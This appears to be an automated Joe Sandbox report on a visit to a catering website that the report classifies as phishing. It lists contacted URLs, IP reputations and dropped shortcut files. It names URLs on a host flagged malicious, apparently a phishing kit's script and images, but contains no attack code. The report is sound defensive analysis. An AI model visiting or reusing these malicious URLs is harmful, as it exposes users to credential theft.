                                                                                              https://static.parastorage.com/services/editor-elements/1.13190.0/rb_wixui.thunderbolt.manifest.min.jsonfalse
                                                                                                high
                                                                                                https://umbrellabusses.com/samhentir/img/log.pngfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://static.parastorage.com/services/wix-thunderbolt/dist/thunderbolt-commons.5848cc89.bundle.min.jsfalse
                                                                                                  high
                                                                                                  https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[SkipToContentButton].69abe737.bundle.min.jsfalse
                                                                                                    high
                                                                                                    https://frog.wix.com/bt?src=29&evid=3&viewer_name=thunderbolt&caching=hit,hit_miss&dc=virginia-pub&microPop=fastly_virginia-pub_g&et=1&event_name=Init&is_cached=true&is_platform_loaded=0&is_rollout=1&ism=1&isp=0&isjp=false&iss=1&ita=1&msid=8fc1138c-79b4-4e29-bbc0-d551c6ca71af&pn=1&sessionId=609f0441-2d8c-4646-846e-278b54a8f519&siterev=11-__siteCacheRevision__&st=2&ts=1782&tts=3324&url=https%3A%2F%2Fwww.samantacatering.com%2F&v=1.15031.0&vsi=4d6f889a-d75d-4216-a25e-a2eb4ad3a234&_brandId=wixfalse
                                                                                                      high
                                                                                                      https://static.parastorage.com/services/wix-thunderbolt/dist/group_6.6ed6aac3.chunk.min.jsfalse
                                                                                                        high
                                                                                                        https://umbrellabusses.com/samhentir/img/pf.pngfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://static.parastorage.com/unpkg/react-dom@18.3.1/umd/react-dom.production.min.jsfalse
                                                                                                          high
                                                                                                          https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_bootstrap-classic.73963ac7.bundle.min.jsfalse
                                                                                                            high
                                                                                                            https://static.parastorage.com/services/wix-thunderbolt/dist/motion.d05a604c.chunk.min.jsfalse
                                                                                                              high
                                                                                                              https://static.parastorage.com/services/wix-thunderbolt/dist/animations.2164ac2a.chunk.min.jsfalse
                                                                                                                high
                                                                                                                https://browser.sentry-cdn.com/6.18.2/bundle.min.jsfalse
                                                                                                                  high
                                                                                                                  https://umbrellabusses.com/samhentir/js/check.js?v=1736517172false
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.samantacatering.com/_api/v1/access-tokensfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://static.parastorage.com/services/wix-thunderbolt/dist/windowScroll.60e92730.chunk.min.jsfalse
                                                                                                                    high
                                                                                                                    https://static.parastorage.com/services/wix-thunderbolt/dist/group_32.ca7bb96a.chunk.min.jsfalse
                                                                                                                      high
                                                                                                                      https://frog.wix.com/false
                                                                                                                        high
                                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                        https://static.parastorage.com/services/wix-thunderbolt/dist/8875.46b20782.bundle.min.js.mapchromecache_142.2.dr, chromecache_208.2.drfalse
                                                                                                                          high
                                                                                                                          https://static.parastorage.com/services/wix-thunderbolt/dist/thunderbolt-commons.5848cc89.bundle.minchromecache_213.2.dr, chromecache_178.2.dr, chromecache_197.2.drfalse
                                                                                                                            high
                                                                                                                            https://static.parastorage.com/services/wix-thunderbolt/dist/componentsLoader.8acadaf2.chunk.min.js.chromecache_156.2.dr, chromecache_176.2.drfalse
                                                                                                                              high
                                                                                                                              https://static.parastorage.com/services/wix-thunderbolt/dist/group_0.774938b3.chunk.min.js.mapchromecache_261.2.dr, chromecache_242.2.drfalse
                                                                                                                                high
                                                                                                                                https://static.parastorage.com/services/wix-thunderbolt/dist/windowScroll.60e92730.chunk.min.js.mapchromecache_207.2.dr, chromecache_229.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://static.parastorage.com/services/editor-elements-design-systems/dist/thunderbolt/chromecache_228.2.dr, chromecache_174.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://static.parastorage.com/services/wix-thunderbolt/dist/bi-common.inline.7f5c46fe.bundle.min.jschromecache_178.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://static.parastorage.com/services/wix-thunderbolt/dist/group_2.484922c1.chunk.min.js.mapchromecache_147.2.dr, chromecache_184.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://static.parastorage.com/services/wix-thunderbolt/dist/overrideGlobals.inline.c89b4b9b.bundle.chromecache_178.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://polyfill-fastly.io/v3/polyfill.min.js?features=fetchchromecache_178.2.drfalse
                                                                                                                                            high
                                                                                                                                            http://polymer.github.io/AUTHORS.txtchromecache_178.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://api.whatsapp.com/send?phone=chromecache_149.2.dr, chromecache_235.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://static.parastorage.com/services/wix-thunderbolt/dist/main.5209da57.bundle.min.js.mapchromecache_225.2.dr, chromecache_145.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://static.parastorage.com/services/wix-thunderbolt/dist/windowMessageRegister.inline.2f428192.bchromecache_178.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://static.parastorage.com/services/wix-thunderbolt/dist/group_28.a74cf8a9.chunk.min.js.mapchromecache_166.2.dr, chromecache_157.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://openjsf.org/chromecache_252.2.dr, chromecache_167.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://static.parastorage.com/services/wix-thunderbolt/dist/group_4.4a5c74ed.chunk.min.js.mapchromecache_170.2.dr, chromecache_204.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.office.com/chromecache_233.2.dr, chromecache_245.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://static.parastorage.com/services/wix-thunderbolt/dist/group_6.6ed6aac3.chunk.min.js.mapchromecache_171.2.dr, chromecache_187.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://static.parastorage.com/services/wix-thunderbolt/dist/group_24.8fa71ce8.chunk.min.js.mapchromecache_258.2.dr, chromecache_230.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                http://polymer.github.io/PATENTS.txtchromecache_178.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://polymer.github.io/LICENSE.txtchromecache_178.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://static.parastorage.com/services/wix-thunderbolt/dist/renderer.1e49a6e4.chunk.min.js.mapchromecache_164.2.dr, chromecache_254.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://static.parastorage.com/services/wix-thunderbolt/dist/lazyCustomElementWrapper.inline.3da43c7chromecache_178.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://static.parastorage.com/services/wix-thunderbolt/dist/createPlatformWorker.inline.a6c05fb0.buchromecache_178.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://underscorejs.org/LICENSEchromecache_252.2.dr, chromecache_167.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://schema.org/chromecache_178.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://static.parastorage.com/services/wix-thunderbolt/dist/custom-element-utils.inline.d8165bd2.buchromecache_178.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://static.parastorage.com/services/wix-thunderbolt/dist/initCustomElements.inline.b306420a.bundchromecache_178.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://greensock.com/standard-licensechromecache_171.2.dr, chromecache_187.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://static.parastorage.com/services/wix-thunderbolt/dist/triggersAndReactions.e7bf7036.chunk.minchromecache_146.2.dr, chromecache_250.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://static.parastorage.com/unpkg/core-js-bundlechromecache_178.2.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://static.parastorage.com/services/wix-thunderbolt/dist/externals-registry.inline.a7ae621e.bundchromecache_178.2.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.aapanel.com/new/download.html?invite_code=aapanelechromecache_248.2.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://static.parastorage.com/unpkg/lodashchromecache_178.2.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://static.parastorage.com/unpkg/reactchromecache_178.2.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://static.parastorage.com/services/wix-thunderbolt/dist/sendBeat12.inline.62e7b16d.bundle.min.jchromecache_178.2.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://npms.io/search?q=ponyfill.chromecache_252.2.dr, chromecache_167.2.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://static.parastorage.com/services/wix-thunderbolt/dist/router.478f8b95.chunk.min.js.mapchromecache_149.2.dr, chromecache_235.2.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://static.parastorage.com/services/wix-thunderbolt/dist/onloadCompsBehaviors.a5af195f.chunk.minchromecache_216.2.dr, chromecache_168.2.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.samantacatering.comchromecache_178.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://static.parastorage.com/services/wix-thunderbolt/dist/group_5.22f6e4ec.chunk.min.js.mapchromecache_222.2.dr, chromecache_196.2.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://static.parastorage.com/services/wix-thunderbolt/dist/group_11.ffa65b2d.chunk.min.js.mapchromecache_191.2.dr, chromecache_253.2.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://static.parastorage.com/unpkg/react-domchromecache_178.2.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://static.parastorage.com/services/wix-thunderbolt/dist/9839.a6a8764d.chunk.min.js.mapchromecache_251.2.dr, chromecache_255.2.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://static.parastorage.com/services/wix-thunderbolt/dist/group_3.0be98eee.chunk.min.js.mapchromecache_205.2.dr, chromecache_259.2.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolchromecache_178.2.dr, chromecache_150.2.dr, chromecache_236.2.dr, chromecache_152.2.dr, chromecache_199.2.dr, chromecache_192.2.dr, chromecache_189.2.dr, chromecache_163.2.dr, chromecache_215.2.dr, chromecache_186.2.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://static.parastorage.com/services/wix-thunderbolt/dist/fastdom.inline.fbeb22f8.bundle.min.js.mchromecache_178.2.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://github.com/getsentry/sentry-javascriptchromecache_200.2.dr, chromecache_183.2.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        3.234.186.141
                                                                                                                                                                                                                        bi-flogger-alb-ext-343643057.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                        34.49.229.81
                                                                                                                                                                                                                        td-static-34-49-229-81.parastorage.comUnited States
                                                                                                                                                                                                                        2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                        104.21.83.97
                                                                                                                                                                                                                        umbrellabusses.comUnited States
                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                        151.101.130.217
                                                                                                                                                                                                                        browser.sentry-cdn.comUnited States
                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                        44.195.212.92
                                                                                                                                                                                                                        sentry-ssl-462500017.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                        99.86.4.125
                                                                                                                                                                                                                        d1cq301dpr7fww.cloudfront.netUnited States
                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                        185.230.63.171
                                                                                                                                                                                                                        samantacatering.comIsrael
                                                                                                                                                                                                                        58182WIX_COMILfalse
                                                                                                                                                                                                                        216.58.206.68
                                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        54.196.108.80
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                                        34.149.87.45
                                                                                                                                                                                                                        td-ccm-neg-87-45.wixdns.netUnited States
                                                                                                                                                                                                                        2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                        35.190.80.1
                                                                                                                                                                                                                        a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        151.101.66.217
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                        34.149.206.255
                                                                                                                                                                                                                        glb-editor.wix.comUnited States
                                                                                                                                                                                                                        2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                        192.168.2.5
                                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                        Analysis ID:1587557
                                                                                                                                                                                                                        Start date and time:2025-01-10 14:51:28 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 3m 27s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                        Sample URL:https://samantacatering.com/
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:7
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal48.phis.win@17/195@34/15
                                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.181.227, 216.58.206.46, 142.251.168.84, 142.250.181.238, 142.250.186.78, 142.250.184.238, 199.232.214.172, 192.229.221.95, 172.217.18.14, 142.250.186.46, 172.217.16.206, 142.250.185.206, 142.250.186.74, 142.250.186.42, 142.250.185.138, 172.217.16.202, 216.58.206.42, 172.217.18.10, 142.250.184.234, 172.217.18.106, 142.250.185.74, 142.250.186.138, 172.217.23.106, 216.58.206.74, 142.250.185.106, 142.250.185.202, 142.250.74.202, 142.250.185.170, 142.250.185.238, 172.217.16.142, 142.250.185.67, 184.28.90.27, 13.107.253.45, 4.245.163.56, 4.175.87.197
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • VT rate limit hit for: https://samantacatering.com/
                                                                                                                                                                                                                        No simulations
                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 12:52:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                                        Entropy (8bit):3.975388771642892
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:87d6TGKsDHGidAKZdA19ehwiZUklqehHy+3:8MDLAy
                                                                                                                                                                                                                        MD5:770589E225AB075E169D4D5378EF1410
                                                                                                                                                                                                                        SHA1:92DD94E608CB4D744D3A3EF67DA96BE4CE17D03C
                                                                                                                                                                                                                        SHA-256:482A10CEC10D962A05025D8926A616B1440E2586C9EBC8A091905AF3FEE4DA83
                                                                                                                                                                                                                        SHA-512:391CBA806A1E7C7590A29DCDB08233B0E46D42C1FBACFB8F63C4793A7DC1B2CA26807EF2E28E818F84C7B52E2729488E185FA24094D39C17C3302CFF5CE7EFE1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,........fc..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I*Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............=......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 12:52:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                                        Entropy (8bit):3.992335718833431
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:8Dd6TGKsDHGidAKZdA1weh/iZUkAQkqehwy+2:8ED59QFy
                                                                                                                                                                                                                        MD5:7CF8949E058810A631180DCFC9B56785
                                                                                                                                                                                                                        SHA1:93337C23D0D99D2299FECB1FE512C122698A9833
                                                                                                                                                                                                                        SHA-256:C51D1E11246FED6860AFA1DBEC1640BBAD2B5900FCCFCDCAB64D4E61E91AD829
                                                                                                                                                                                                                        SHA-512:488D0FBE55BA6C871641BA66E57E59AEBA78D0FC5F55293875EBC6A7EC6A5B2D338801BAB17FF01A61ADE358B812E635154F2382414F60C2C88FF6FB7EF736CB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....}..fc..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I*Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............=......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2693
                                                                                                                                                                                                                        Entropy (8bit):4.0047487180493
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:8xjd6TGKsHGidAKZdA14tseh7sFiZUkmgqeh7sOy+BX:8xkD7nEy
                                                                                                                                                                                                                        MD5:B6E7C889DFD2011397E282CA2285A75E
                                                                                                                                                                                                                        SHA1:7217DC5AD4C377E69941ADED36CAFAE257E5184E
                                                                                                                                                                                                                        SHA-256:44AF1741B5B52D7AE6C294FBC06AF5352AB3FCA1C61120ACB57AE73A720099E4
                                                                                                                                                                                                                        SHA-512:91044200365495215E0C0AAE9BDBCF1D34105648113FDFC27FE2992DCE41C4B67272149DE7D90591DDFE4AAFAA40488EAD55284FD9D5ABF725C9D7E1C36FB8ED
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I*Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............=......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 12:52:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                        Entropy (8bit):3.9904778250600796
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:8Hkd6TGKsDHGidAKZdA1vehDiZUkwqehMy+R:8HZDa2y
                                                                                                                                                                                                                        MD5:FF5A02F1A70C3645671D11B3628ED15C
                                                                                                                                                                                                                        SHA1:04C00364CE30EAE3A01F319A4766747B9DB0DA70
                                                                                                                                                                                                                        SHA-256:5281F89E7292CE625EB0871D0CC9E43A89BFB990859D28D4C78CE75D627CC218
                                                                                                                                                                                                                        SHA-512:95E2F9445E4336A8AF4748D14A153848ACADD09A4BDB6ACF4408CF56EA733EFA88946F3EE370B664677C0BEB4EF5473FD6948E2CAD6F5F18227B3F23AF16922B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....V..fc..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I*Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............=......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 12:52:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                        Entropy (8bit):3.9793443555060435
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:8Gd6TGKsDHGidAKZdA1hehBiZUk1W1qehiy+C:8PDa9Cy
                                                                                                                                                                                                                        MD5:E957DA112287FE10469AFF2C51467532
                                                                                                                                                                                                                        SHA1:7B7CBD84265493754F02C4C26A7119B1A481E7B6
                                                                                                                                                                                                                        SHA-256:B4E26A82DFD0EDEC05C1D7315133462847F271C2D5A99F429FFC9341432F2276
                                                                                                                                                                                                                        SHA-512:9B50190D927B28A9F53CC1989A782CCE862C2E5A4AD7752E8A97BA7F5F23DBCF84460D3FD0CEAD780DABBE3933E502B0064F53C83FE9AD374895C4A436BF1E6A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
